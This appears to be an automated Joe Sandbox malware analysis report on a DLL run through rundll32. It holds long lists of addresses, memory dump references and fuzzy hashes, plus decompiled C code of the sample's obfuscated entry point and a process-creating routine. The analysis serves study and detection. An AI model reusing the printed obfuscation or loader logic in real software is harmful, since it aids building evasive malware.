                                                                                                                                                            0x0037fc24
                                                                                                                                                            0x0037fc28
                                                                                                                                                            0x0037fc30
                                                                                                                                                            0x0037fc43
                                                                                                                                                            0x0037fc44
                                                                                                                                                            0x0037fc4b
                                                                                                                                                            0x0037fc56
                                                                                                                                                            0x0037fc61
                                                                                                                                                            0x0037fc6c
                                                                                                                                                            0x0037fc77
                                                                                                                                                            0x0037fc87
                                                                                                                                                            0x0037fc91
                                                                                                                                                            0x0037fc96
                                                                                                                                                            0x0037fc9c
                                                                                                                                                            0x0037fca4
                                                                                                                                                            0x0037fcac
                                                                                                                                                            0x0037fcb4
                                                                                                                                                            0x0037fcb9
                                                                                                                                                            0x0037fcc1
                                                                                                                                                            0x0037fccc
                                                                                                                                                            0x0037fcd7
                                                                                                                                                            0x0037fce2
                                                                                                                                                            0x0037fcea
                                                                                                                                                            0x0037fcf6
                                                                                                                                                            0x0037fcf9
                                                                                                                                                            0x0037fcfd
                                                                                                                                                            0x0037fd05
                                                                                                                                                            0x0037fd0d
                                                                                                                                                            0x0037fd1a
                                                                                                                                                            0x0037fd1e
                                                                                                                                                            0x0037fd23
                                                                                                                                                            0x0037fd2b
                                                                                                                                                            0x0037fd36
                                                                                                                                                            0x0037fd3e
                                                                                                                                                            0x0037fd49
                                                                                                                                                            0x0037fd51
                                                                                                                                                            0x0037fd59
                                                                                                                                                            0x0037fd61
                                                                                                                                                            0x0037fd69
                                                                                                                                                            0x0037fd6e
                                                                                                                                                            0x0037fd76
                                                                                                                                                            0x0037fd7b
                                                                                                                                                            0x0037fd83
                                                                                                                                                            0x0037fd8b
                                                                                                                                                            0x0037fd93
                                                                                                                                                            0x0037fd9b
                                                                                                                                                            0x0037fda8
                                                                                                                                                            0x0037fdac
                                                                                                                                                            0x0037fdb4
                                                                                                                                                            0x0037fdbc
                                                                                                                                                            0x0037fdc4
                                                                                                                                                            0x0037fdcc
                                                                                                                                                            0x0037fdd4
                                                                                                                                                            0x0037fddc
                                                                                                                                                            0x0037fde0
                                                                                                                                                            0x0037fdf2
                                                                                                                                                            0x0037ffd1
                                                                                                                                                            0x0037ffd5
                                                                                                                                                            0x0037ffd6
                                                                                                                                                            0x0037ffd7
                                                                                                                                                            0x0037ffd8
                                                                                                                                                            0x0037ffd9
                                                                                                                                                            0x0037ffe8
                                                                                                                                                            0x0037ffe9
                                                                                                                                                            0x0037fff3
                                                                                                                                                            0x0037fff3
                                                                                                                                                            0x0037fff7
                                                                                                                                                            0x00380000
                                                                                                                                                            0x00380000
                                                                                                                                                            0x0037fdfe
                                                                                                                                                            0x0037ff5e
                                                                                                                                                            0x0037ff60
                                                                                                                                                            0x0037ff64
                                                                                                                                                            0x0037ff99
                                                                                                                                                            0x0037ff99
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037ff66
                                                                                                                                                            0x0037ff66
                                                                                                                                                            0x0037ff66
                                                                                                                                                            0x0037ff6a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037ff6c
                                                                                                                                                            0x0037ff81
                                                                                                                                                            0x0037ff81
                                                                                                                                                            0x0037ff84
                                                                                                                                                            0x0037ff87
                                                                                                                                                            0x0037ff8a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037ff75
                                                                                                                                                            0x0037ff79
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037ff7b
                                                                                                                                                            0x0037ff7e
                                                                                                                                                            0x0037ff7e
                                                                                                                                                            0x0037ff7e
                                                                                                                                                            0x0037ff8c
                                                                                                                                                            0x0037ff8c
                                                                                                                                                            0x0037ff8e
                                                                                                                                                            0x0037ff91
                                                                                                                                                            0x0037ff91
                                                                                                                                                            0x0037ff94
                                                                                                                                                            0x0037ff94
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037ff66
                                                                                                                                                            0x0037fe0a
                                                                                                                                                            0x0037ff52
                                                                                                                                                            0x0037ff54
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037ff54
                                                                                                                                                            0x0037fe16
                                                                                                                                                            0x0037fe8f
                                                                                                                                                            0x0037fe9a
                                                                                                                                                            0x0037fe9e
                                                                                                                                                            0x0037fead
                                                                                                                                                            0x0037feae
                                                                                                                                                            0x0037fecf
                                                                                                                                                            0x0037fed4
                                                                                                                                                            0x0037fee0
                                                                                                                                                            0x0037ff22
                                                                                                                                                            0x0037ff2e
                                                                                                                                                            0x0037ff37
                                                                                                                                                            0x0037ff3c
                                                                                                                                                            0x0037ff3f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037ff3f
                                                                                                                                                            0x0037fe18
                                                                                                                                                            0x0037fe1e
                                                                                                                                                            0x0037fe24
                                                                                                                                                            0x0037fe2d
                                                                                                                                                            0x0037fe5e
                                                                                                                                                            0x0037fe6a
                                                                                                                                                            0x0037fe74
                                                                                                                                                            0x0037fe7c
                                                                                                                                                            0x0037fe82
                                                                                                                                                            0x0037fe87
                                                                                                                                                            0x0037fe87
                                                                                                                                                            0x0037ffc3
                                                                                                                                                            0x0037ffc9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037ffcf
                                                                                                                                                            0x0037ffb7
                                                                                                                                                            0x0037ffbd
                                                                                                                                                            0x0037ffbe
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FolderPath
                                                                                                                                                            • String ID: '+=$F8y$PG&$Qec$RYt$oq$wpc$zn $Y
                                                                                                                                                            • API String ID: 1514166925-3316477785
                                                                                                                                                            • Opcode ID: 7439af5cd0d6b6030691669be3a6ad094b1abd6b95bd20a7a0a58586a92dbb14
                                                                                                                                                            • Instruction ID: c612a5e83176d82ee95a45956fecef8b34c88e640d5ee7964b4c70c22831f0df
                                                                                                                                                            • Opcode Fuzzy Hash: 7439af5cd0d6b6030691669be3a6ad094b1abd6b95bd20a7a0a58586a92dbb14
                                                                                                                                                            • Instruction Fuzzy Hash: 290222725083809FD369CF25C58AA1BFBE2BBC5718F108A1DF1D986260D7B98949CF43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0037E991 Relevance: 2.6, Strings: 2, Instructions: 68COMMONCrypto
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 267 37e991-37ea60 268 37ea62-37ea77 call 37f8fd 267->268 269 37ea90-37ea96 267->269 268->269 272 37ea79-37ea88 call 3793ed 268->272 274 37ea8d 272->274 274->269
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			_entry_(intOrPtr _a4, char _a8) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _t85;
				signed int _t86;
				signed int _t87;

				_v32 = _v32 & 0x00000000;
				_v44 = 0xa88528;
				_v40 = 0x811176;
				_v36 = 0xed2c64;
				_v20 = 0x893932;
				_v20 = _v20 ^ 0x2faf083b;
				_v20 = _v20 ^ 0x2f2d1c53;
				_v8 = 0xbe2d1;
				_t85 = 0x2e;
				_v8 = _v8 / _t85;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 + 0xffff961f;
				_v8 = _v8 ^ 0xfff451d0;
				_v16 = 0x50855f;
				_v16 = _v16 >> 8;
				_t86 = 0x5e;
				_v16 = _v16 / _t86;
				_v16 = _v16 ^ 0x0002614f;
				_v28 = 0x752e5d;
				_t36 =  &_v28; // 0x752e5d
				_t87 = 0x4e;
				_v28 =  *_t36 * 0x6f;
				_v28 = _v28 ^ 0x32c1ec83;
				_v12 = 0xba9db2;
				_v12 = _v12 * 0x41;
				_v12 = _v12 + 0xfc46;
				_v12 = _v12 | 0x4911db39;
				_v12 = _v12 ^ 0x6f7f0271;
				_v24 = 0x2e0372;
				_v24 = _v24 / _t87;
				_v24 = _v24 ^ 0x000c7ca5;
				_t58 =  &_a8;
				 *_t58 = _a8 - 1;
				if( *_t58 == 0) {
					 *0x39320c = _a4;
					if(E0037F8FD() != 0) {
						E003793ED(); // executed
					}
				}
				return 1;
			}
















                                                                                                                                                            0x0037e997
                                                                                                                                                            0x0037e99d
                                                                                                                                                            0x0037e9a4
                                                                                                                                                            0x0037e9ab
                                                                                                                                                            0x0037e9b2
                                                                                                                                                            0x0037e9b9
                                                                                                                                                            0x0037e9c0
                                                                                                                                                            0x0037e9c7
                                                                                                                                                            0x0037e9d3
                                                                                                                                                            0x0037e9d8
                                                                                                                                                            0x0037e9dd
                                                                                                                                                            0x0037e9e1
                                                                                                                                                            0x0037e9e8
                                                                                                                                                            0x0037e9ef
                                                                                                                                                            0x0037e9f6
                                                                                                                                                            0x0037e9fd
                                                                                                                                                            0x0037ea02
                                                                                                                                                            0x0037ea07
                                                                                                                                                            0x0037ea0e
                                                                                                                                                            0x0037ea15
                                                                                                                                                            0x0037ea19
                                                                                                                                                            0x0037ea1a
                                                                                                                                                            0x0037ea1d
                                                                                                                                                            0x0037ea24
                                                                                                                                                            0x0037ea2f
                                                                                                                                                            0x0037ea32
                                                                                                                                                            0x0037ea39
                                                                                                                                                            0x0037ea40
                                                                                                                                                            0x0037ea47
                                                                                                                                                            0x0037ea53
                                                                                                                                                            0x0037ea56
                                                                                                                                                            0x0037ea5d
                                                                                                                                                            0x0037ea5d
                                                                                                                                                            0x0037ea60
                                                                                                                                                            0x0037ea65
                                                                                                                                                            0x0037ea77
                                                                                                                                                            0x0037ea88
                                                                                                                                                            0x0037ea8d
                                                                                                                                                            0x0037ea77
                                                                                                                                                            0x0037ea96

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                            • String ID: ].u$d,
                                                                                                                                                            • API String ID: 621844428-1507873175
                                                                                                                                                            • Opcode ID: f26fa05cdc3f6213229a8a0b5dc721123378c9631898e5114ccd8f7410b342db
                                                                                                                                                            • Instruction ID: b1f31280166f262dc69fbdb82430346aacfc3d3e1514808502a283d22ae42029
                                                                                                                                                            • Opcode Fuzzy Hash: f26fa05cdc3f6213229a8a0b5dc721123378c9631898e5114ccd8f7410b342db
                                                                                                                                                            • Instruction Fuzzy Hash: 0231F4B1D00209EBDB18DFA4C98A6DEBBF0FB54304F20C199D514BB250D7B45B859F80
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0037AB87 Relevance: 1.4, Strings: 1, Instructions: 154COMMONCrypto
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 288 37ab87-37ad94 call 3820b9 call 374b61 call 377f5d 294 37ad99-37ad9e 288->294 295 37ada0-37ada2 294->295 296 37addd 294->296 298 37ada4-37adaa 295->298 299 37adb0-37addb call 381e67 * 2 295->299 297 37addf-37ade5 296->297 300 37adab-37adae 298->300 299->300 300->297
                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                            			E0037AB87(void* __ecx, void* __edx, void* __eflags) {
				void* _t151;
				void* _t163;
				void* _t164;
				signed int _t169;
				signed int _t170;
				signed int _t171;
				intOrPtr _t187;
				intOrPtr _t190;
				intOrPtr* _t193;
				void* _t194;

				_t193 = _t194 - 0x5c;
				_push( *((intOrPtr*)(_t193 + 0x7c)));
				_t187 =  *((intOrPtr*)(_t193 + 0x6c));
				_push( *((intOrPtr*)(_t193 + 0x78)));
				_push(0);
				_push( *((intOrPtr*)(_t193 + 0x70)));
				_push(_t187);
				_push( *((intOrPtr*)(_t193 + 0x68)));
				_push( *((intOrPtr*)(_t193 + 0x64)));
				_push(__ecx);
				E003820B9(_t151);
				 *(_t193 + 0x18) =  *(_t193 + 0x18) & 0x00000000;
				 *((intOrPtr*)(_t193 + 0xc)) = 0xc7e504;
				 *((intOrPtr*)(_t193 + 0x10)) = 0xaf8af2;
				 *((intOrPtr*)(_t193 + 0x14)) = 0x514a6e;
				 *(_t193 + 0x34) = 0xb35e3d;
				 *(_t193 + 0x34) =  *(_t193 + 0x34) >> 0xc;
				 *(_t193 + 0x34) =  *(_t193 + 0x34) ^ 0x00059917;
				 *(_t193 + 0x1c) = 0xb39a57;
				 *(_t193 + 0x1c) =  *(_t193 + 0x1c) ^ 0xb15fb5d5;
				 *(_t193 + 0x1c) =  *(_t193 + 0x1c) ^ 0xb1e87bcb;
				 *(_t193 + 0x54) = 0x8cfebd;
				 *(_t193 + 0x54) =  *(_t193 + 0x54) ^ 0x2de11ebd;
				 *(_t193 + 0x54) =  *(_t193 + 0x54) >> 7;
				_t169 = 0x1d;
				 *(_t193 + 0x54) =  *(_t193 + 0x54) / _t169;
				 *(_t193 + 0x54) =  *(_t193 + 0x54) ^ 0x0009bd52;
				 *(_t193 + 0x24) = 0xadd23a;
				 *(_t193 + 0x24) =  *(_t193 + 0x24) + 0xffffea89;
				 *(_t193 + 0x24) =  *(_t193 + 0x24) ^ 0x00a2a736;
				 *(_t193 + 0x20) = 0x1d5481;
				 *(_t193 + 0x20) =  *(_t193 + 0x20) | 0x53ff6cee;
				 *(_t193 + 0x20) =  *(_t193 + 0x20) ^ 0x53f584ee;
				 *(_t193 + 0x2c) = 0x3c40b3;
				 *(_t193 + 0x2c) =  *(_t193 + 0x2c) + 0xffffdf55;
				 *(_t193 + 0x2c) =  *(_t193 + 0x2c) ^ 0x0031ac36;
				 *(_t193 + 0x3c) = 0x52e0cb;
				 *(_t193 + 0x3c) =  *(_t193 + 0x3c) ^ 0x44a49456;
				 *(_t193 + 0x3c) =  *(_t193 + 0x3c) ^ 0x44f1a540;
				 *(_t193 + 0x4c) = 0x46a878;
				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) << 0xf;
				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) + 0xffff6c50;
				 *(_t193 + 0x4c) =  *(_t193 + 0x4c) ^ 0x5431f96e;
				 *(_t193 + 0x30) = 0x13da24;
				 *(_t193 + 0x30) =  *(_t193 + 0x30) << 1;
				 *(_t193 + 0x30) =  *(_t193 + 0x30) ^ 0x002ba36f;
				 *(_t193 + 0x44) = 0xdb90c5;
				 *(_t193 + 0x44) =  *(_t193 + 0x44) << 0xf;
				 *(_t193 + 0x44) =  *(_t193 + 0x44) + 0x7bf2;
				 *(_t193 + 0x44) =  *(_t193 + 0x44) ^ 0xc86621d2;
				 *(_t193 + 0x38) = 0xc3d0db;
				 *(_t193 + 0x38) =  *(_t193 + 0x38) << 0xf;
				 *(_t193 + 0x38) =  *(_t193 + 0x38) ^ 0xe86994ab;
				 *(_t193 + 0x58) = 0x1a470a;
				 *(_t193 + 0x58) =  *(_t193 + 0x58) << 1;
				 *(_t193 + 0x58) =  *(_t193 + 0x58) + 0x63a7;
				 *(_t193 + 0x58) =  *(_t193 + 0x58) | 0x340679df;
				 *(_t193 + 0x58) =  *(_t193 + 0x58) ^ 0x343a3883;
				 *(_t193 + 0x40) = 0xc6f633;
				 *(_t193 + 0x40) =  *(_t193 + 0x40) << 3;
				 *(_t193 + 0x40) =  *(_t193 + 0x40) ^ 0x74163c66;
				 *(_t193 + 0x40) =  *(_t193 + 0x40) ^ 0x722ef2ae;
				 *(_t193 + 0x50) = 0xa2e0bb;
				_t170 = 0x56;
				 *(_t193 + 0x50) =  *(_t193 + 0x50) / _t170;
				 *(_t193 + 0x50) =  *(_t193 + 0x50) + 0x1f8a;
				 *(_t193 + 0x50) =  *(_t193 + 0x50) * 0x7f;
				 *(_t193 + 0x50) =  *(_t193 + 0x50) ^ 0x01094e1c;
				 *(_t193 + 0x28) = 0x4b9267;
				_t171 = 0x28;
				_t115 = _t193 - 0x48; // 0x181c8bbc
				_t172 = _t115;
				 *(_t193 + 0x28) =  *(_t193 + 0x28) / _t171;
				 *(_t193 + 0x28) =  *(_t193 + 0x28) ^ 0x00093005;
				 *(_t193 + 0x48) = 0xd50758;
				 *(_t193 + 0x48) =  *(_t193 + 0x48) ^ 0x7d3d0603;
				 *(_t193 + 0x48) =  *(_t193 + 0x48) << 9;
				 *(_t193 + 0x48) =  *(_t193 + 0x48) ^ 0xd00f781a;
				_push( *(_t193 + 0x1c));
				_push( *(_t193 + 0x34));
				_t190 = 0x44;
				E00374B61(_t115, _t190);
				 *((intOrPtr*)(_t193 - 0x48)) = _t190;
				_t129 = _t193 - 4; // 0x181c8c00
				_t131 = _t193 - 0x48; // 0x181c8bbc
				_t163 = E00377F5D(_t115, _t172,  *((intOrPtr*)(_t193 + 0x70)), _t172, _t131, _t172, _t172,  *((intOrPtr*)(_t193 + 0x64)),  *(_t193 + 0x24),  *(_t193 + 0x20),  *(_t193 + 0x2c),  *(_t193 + 0x3c),  *(_t193 + 0x4c),  *((intOrPtr*)(_t193 + 0x78)), _t129); // executed
				if(_t163 == 0) {
					_t164 = 0;
				} else {
					if(_t187 == 0) {
						E00381E67( *(_t193 + 0x30),  *(_t193 + 0x44),  *(_t193 + 0x38),  *(_t193 + 0x58),  *((intOrPtr*)(_t193 - 4)));
						E00381E67( *(_t193 + 0x40),  *(_t193 + 0x50),  *(_t193 + 0x28),  *(_t193 + 0x48),  *_t193);
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t164 = 1;
				}
				return _t164;
			}













                                                                                                                                                            0x0037ab88
                                                                                                                                                            0x0037ab94
                                                                                                                                                            0x0037ab97
                                                                                                                                                            0x0037ab9a
                                                                                                                                                            0x0037ab9d
                                                                                                                                                            0x0037ab9f
                                                                                                                                                            0x0037aba2
                                                                                                                                                            0x0037aba3
                                                                                                                                                            0x0037aba6
                                                                                                                                                            0x0037abaa
                                                                                                                                                            0x0037abab
                                                                                                                                                            0x0037abb0
                                                                                                                                                            0x0037abb6
                                                                                                                                                            0x0037abbd
                                                                                                                                                            0x0037abc4
                                                                                                                                                            0x0037abcb
                                                                                                                                                            0x0037abd2
                                                                                                                                                            0x0037abd6
                                                                                                                                                            0x0037abdd
                                                                                                                                                            0x0037abe4
                                                                                                                                                            0x0037abeb
                                                                                                                                                            0x0037abf2
                                                                                                                                                            0x0037abf9
                                                                                                                                                            0x0037ac00
                                                                                                                                                            0x0037ac09
                                                                                                                                                            0x0037ac0e
                                                                                                                                                            0x0037ac13
                                                                                                                                                            0x0037ac1a
                                                                                                                                                            0x0037ac21
                                                                                                                                                            0x0037ac28
                                                                                                                                                            0x0037ac2f
                                                                                                                                                            0x0037ac36
                                                                                                                                                            0x0037ac3d
                                                                                                                                                            0x0037ac44
                                                                                                                                                            0x0037ac4b
                                                                                                                                                            0x0037ac52
                                                                                                                                                            0x0037ac59
                                                                                                                                                            0x0037ac60
                                                                                                                                                            0x0037ac67
                                                                                                                                                            0x0037ac6e
                                                                                                                                                            0x0037ac75
                                                                                                                                                            0x0037ac79
                                                                                                                                                            0x0037ac80
                                                                                                                                                            0x0037ac87
                                                                                                                                                            0x0037ac8e
                                                                                                                                                            0x0037ac91
                                                                                                                                                            0x0037ac98
                                                                                                                                                            0x0037ac9f
                                                                                                                                                            0x0037aca3
                                                                                                                                                            0x0037acaa
                                                                                                                                                            0x0037acb1
                                                                                                                                                            0x0037acb8
                                                                                                                                                            0x0037acbc
                                                                                                                                                            0x0037acc3
                                                                                                                                                            0x0037acca
                                                                                                                                                            0x0037accd
                                                                                                                                                            0x0037acd4
                                                                                                                                                            0x0037acdb
                                                                                                                                                            0x0037ace2
                                                                                                                                                            0x0037ace9
                                                                                                                                                            0x0037aced
                                                                                                                                                            0x0037acf4
                                                                                                                                                            0x0037acfb
                                                                                                                                                            0x0037ad05
                                                                                                                                                            0x0037ad08
                                                                                                                                                            0x0037ad0b
                                                                                                                                                            0x0037ad16
                                                                                                                                                            0x0037ad19
                                                                                                                                                            0x0037ad20
                                                                                                                                                            0x0037ad2c
                                                                                                                                                            0x0037ad31
                                                                                                                                                            0x0037ad31
                                                                                                                                                            0x0037ad34
                                                                                                                                                            0x0037ad37
                                                                                                                                                            0x0037ad3e
                                                                                                                                                            0x0037ad45
                                                                                                                                                            0x0037ad4c
                                                                                                                                                            0x0037ad50
                                                                                                                                                            0x0037ad57
                                                                                                                                                            0x0037ad5a
                                                                                                                                                            0x0037ad5f
                                                                                                                                                            0x0037ad62
                                                                                                                                                            0x0037ad6a
                                                                                                                                                            0x0037ad6d
                                                                                                                                                            0x0037ad74
                                                                                                                                                            0x0037ad94
                                                                                                                                                            0x0037ad9e
                                                                                                                                                            0x0037addd
                                                                                                                                                            0x0037ada0
                                                                                                                                                            0x0037ada2
                                                                                                                                                            0x0037adbf
                                                                                                                                                            0x0037add3
                                                                                                                                                            0x0037ada4
                                                                                                                                                            0x0037ada7
                                                                                                                                                            0x0037ada8
                                                                                                                                                            0x0037ada9
                                                                                                                                                            0x0037adaa
                                                                                                                                                            0x0037adaa
                                                                                                                                                            0x0037adad
                                                                                                                                                            0x0037adad
                                                                                                                                                            0x0037ade5

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateProcess
                                                                                                                                                            • String ID: nJQ
                                                                                                                                                            • API String ID: 963392458-2884827605
                                                                                                                                                            • Opcode ID: 085fbfbc5749637a8e2c0a48e3d829b6a396887fdc5499ebf166a1a814a86cbe
                                                                                                                                                            • Instruction ID: 1d178c6cd09fceaa68ff5cccb401516988d28b84466b9f1f42b5dad158f2c90e
                                                                                                                                                            • Opcode Fuzzy Hash: 085fbfbc5749637a8e2c0a48e3d829b6a396887fdc5499ebf166a1a814a86cbe
                                                                                                                                                            • Instruction Fuzzy Hash: 8671F272400288EBCF69CFA4C9498CE3BA5FF48358F118119FE1A96224D3B6D969DF45
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10006A90 Relevance: 18.4, APIs: 1, Instructions: 16933COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 110 10006a90-10006aab call 1002f9a6 113 10006ab7-10012570 110->113 114 10006aad-10006ab2 110->114 116 10012584-1001258b 113->116 115 100125b4-100125b8 114->115 117 10012597-1001259b call 1002fa69 116->117 118 1001258d-10012595 116->118 121 100125a0-100125a9 117->121 118->116 122 100125ab-100125ad 121->122 123 100125af 121->123 122->115 123->115
                                                                                                                                                            APIs
                                                                                                                                                            • _malloc.LIBCMT ref: 10006A9C
                                                                                                                                                              • Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
                                                                                                                                                              • Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
                                                                                                                                                              • Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocateHeap_malloc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 501242067-0
                                                                                                                                                            • Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                                                            • Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
                                                                                                                                                            • Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                                                            • Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1002083B Relevance: 16.6, APIs: 11, Instructions: 103memoryCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
                                                                                                                                                            • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
                                                                                                                                                            • GlobalHandle.KERNEL32(002B89A8), ref: 100208A9
                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
                                                                                                                                                            • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
                                                                                                                                                            • GlobalHandle.KERNEL32(002B89A8), ref: 100208DB
                                                                                                                                                            • GlobalLock.KERNEL32 ref: 100208E2
                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
                                                                                                                                                            • GlobalLock.KERNEL32 ref: 100208F8
                                                                                                                                                            • _memset.LIBCMT ref: 10020911
                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 1002093D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 496899490-0
                                                                                                                                                            • Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                                                            • Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
